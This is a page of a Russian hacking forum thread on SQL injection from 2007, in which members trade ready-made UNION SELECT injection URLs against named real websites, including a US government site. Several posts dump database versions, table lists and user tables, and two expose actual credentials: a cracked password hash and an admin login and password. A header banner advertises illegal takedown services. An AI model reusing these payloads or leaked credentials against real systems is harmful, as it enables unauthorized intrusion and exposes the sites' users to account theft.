Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 193 из 1242

193

Опции темы

Поиск в этой теме

Опции просмотра

#1921

16.04.2007, 00:09

Constantine

Members of Antichat - Level 5

Регистрация: 24.11.2006

Сообщений: 927

Провел на форуме:
7192869

Репутация: 3033

Никаких извращений не будет, после того как переберу всю тему, поставлю поисковый скрипт- там и будем чекать

__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

#1922

16.04.2007, 00:44

Thanat0z

Постоянный

Регистрация: 06.12.2006

Сообщений: 762

Провел на форуме:
5352530

Репутация: 2062

Зачем вы тратите свои время и усилия? Прежде чем просто постить в тему надо на гугле делать проверку типа

Цитата:

antichat somehost.com

иногда прокатывает только

Цитата:

antichat somehost

А тем кто постит бояны минус ставить. И всё. В правила темы внести это предупреждение

#1923

16.04.2007, 02:05

Isis

Флудер

Регистрация: 20.11.2006

Сообщений: 3,316

Провел на форуме:
16641028

Репутация: 2371

www.stroyzona.com

Код:

http://www.stroyzona.com/warelist.php3?id=-1800+union+select+1,concat(version(),char(58,58),database(),char(58,58),user()),3/*

www.rocit.ru

Код:

http://www.rocit.ru/news/shownews.php3?id=-30598+union+select+1,2,3,4,5,6,7,concat(version(),char(58,58),database(),char(58,58),user()),9,10/*

#1924

16.04.2007, 02:41

~~zl0ba~~

Banned

Регистрация: 10.10.2006

Сообщений: 596

Провел на форуме:
2132613

Репутация: 1365

Код:

http://coce.samhsa.gov/cod_resources/index.aspx?obj=42+or+1=@@version--

Можно покавырять, но мне не хочиться!
me/ боиться!

В процесе поиска:

Код:

http://www.terjemar.net/dict5.php?baseid=-928+union+select+1,2,3/*

для тех у кого много трафа!

#1925

16.04.2007, 03:07

KPOT_f!nd

Познавший АНТИЧАТ

Регистрация: 25.08.2006

Сообщений: 1,524

Провел на форуме:
3405508

Репутация: 1745

Код:

http://director-online.com/buildArticle.php?id=-2+union+select+1,2,3,4,5,6,7,8+from+user/*

#1926

16.04.2007, 06:21

limpompo

Друг Клитора

Регистрация: 27.08.2005

Сообщений: 1,662

Провел на форуме:
6913553

Репутация: 1329

Цитата:

Сообщение от KPOT_f!nd

Код:

http://director-online.com/buildArticle.php?id=-2+union+select+1,2,3,4,5,6,7,8+from+user/*

Хочу добавить по Этому Сайтику....

Нашёл ещё 1 табличку: phorum_users
Запрос

Код:

director-online.com/buildArticle.php?
POST: id=-2+UNION+SELECT+1,2,3,4,5,concat(username,char(58),password),7,8+FROM+phorum_users/*

=========
Для id=1
username: !aaf
hash: 1b207465eac83b5d4b12e335faa0b53a
crackHash: paula

========

Также Колонки для этой таблички

Код:

id
name
username
password
emai
webpage
image
icq
aol
yahoo
msn
jabber
signature
hide_email
permission_level
max_group_permission_level
lang
password_tmp

Последний раз редактировалось limpompo; 16.04.2007 в 06:26..

#1927

16.04.2007, 13:21

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Отправить сообщение для n1†R0x с помощью ICQ

один из кинотеатров Питера =)
kolizey.spb.ru

Код:

http://www.kolizey.spb.ru/description.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(login,0x3a,password,0x3a,email),18+from+user/*&lang=eng

юзер:пасс:мыло

там еще есть таблица 'guestbook', колонка вроде 'email', но я не уверен, копаться не стал.

#1928

16.04.2007, 13:40

Isis

Флудер

Регистрация: 20.11.2006

Сообщений: 3,316

Провел на форуме:
16641028

Репутация: 2371

www.efimov-partners.ru

Код:

http://www.efimov-partners.ru/vacancy/?rubric=-47+union+select+concat(version(),char(58,58),database(),char(58,58),user())/*

www.santechmart.ru

Код:

http://www.santechmart.ru/print.php?id=-1+union+select+concat(version(),char(58,58),database(),char(58,58),user())/*

www.yurclub.ru

Код:

http://www.yurclub.ru/catalog/geo.list.php?s=-11000+union+select+1,concat(version(),char(58,58),database(),char(58,58),user())/*&r=0&PHPSESSID=d974a3bb28fedf99bf678190478bb00b

www.ladofon.ru

Код:

http://www.ladofon.ru/news_detail.php?news_id=-69+union+select+1,2,3,concat(version(),char(58,58),database(),char(58,58),user()),5,6,7,8/*

http://www.staldveri.ru

Код:

http://www.staldveri.ru/products/popup.php?id=-2+union+select+1,concat(version(),char(58,58),database(),char(58,58),user()),3,4,5,6,7/*

www.spbgid.ru

Код:

http://www.spbgid.ru/index.php?type=-1+union+select+1,convert(concat(version(),char(58,58),database(),char(58,58),user())%20using%20cp1251),3/*

#1929

16.04.2007, 14:14

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

Достали в игрушки играть давайте.

http://quest.mini-rinok.ru/index.php?id=1
http://quest.mini-rinok.ru/index.php?id=2
http://quest.mini-rinok.ru/index.php?id=2-1

Кто составит корректный запрос +20 от меня.

#1930

16.04.2007, 16:04

kair

Участник форума

Регистрация: 12.10.2006

Сообщений: 158

Провел на форуме:
668286

Репутация: 187

Отправить сообщение для kair с помощью ICQ

http://www.prokredo.ru/collegefaculty.php?id=50%20union%20select%201,conc at(login,char(58),password),3,4,5,6,7,8,9,10,11,12 ,13,14%20FROM%20kredo_admins/*
-------------------------------
sql password
mooncat login
------------------------------
TABLES:

Код:

CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE,  ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, TABLES,
TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES,VIEWS, kredo_activity,
kredo_admins, kredo_albums, kredo_article, kredo_college, kredo_company, kredo_contacts, kredo_doc, kredo_faculty, kredo_links, kredo_media, kredo_news, kredo_opinions, kredo_pages, kredo_partner, kredo_photo, kredo_presskit, kredo_publications, kredo_questions, kredo_represents,kredo_sections, kredo_students, kredo_vacancy, prokredo_forum_auth_access, prokredo_forum_banlist, prokredo_forum_categories, prokredo_forum_config, prokredo_forum_confirm, prokredo_forum_disallow, prokredo_forum_forum_prune, prokredo_forum_forums, prokredo_forum_groups, prokredo_forum_posts, prokredo_forum_posts_text, prokredo_forum_privmsgs, prokredo_forum_privmsgs_text, prokredo_forum_ranks, prokredo_forum_search_results, prokredo_forum_search_wordlist, prokredo_forum_search_wordmatch, prokredo_forum_sessions, prokredo_forum_sessions_keys, prokredo_forum_smilies, prokredo_forum_themes, prokredo_forum_themes_name, prokredo_forum_topics, prokredo_forum_topics_watch, prokredo_forum_user_group, prokredo_forum_users, prokredo_forum_vote_desc, prokredo_forum_vote_results, prokredo_forum_vote_voters, prokredo_forum_words

---------------
COLUMNS:

Код:

 CHARACTER_SET_NAME, DEFAULT_COLLATE_NAME, DESCRIPTION, MAXLEN, COLLATION_NAME

http://quest.mini-rinok.ru/index.php?id=1
cash, а ты уверен что там можно что-то сделать?

Страница 193 из 1242

193

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)

Быстрый переход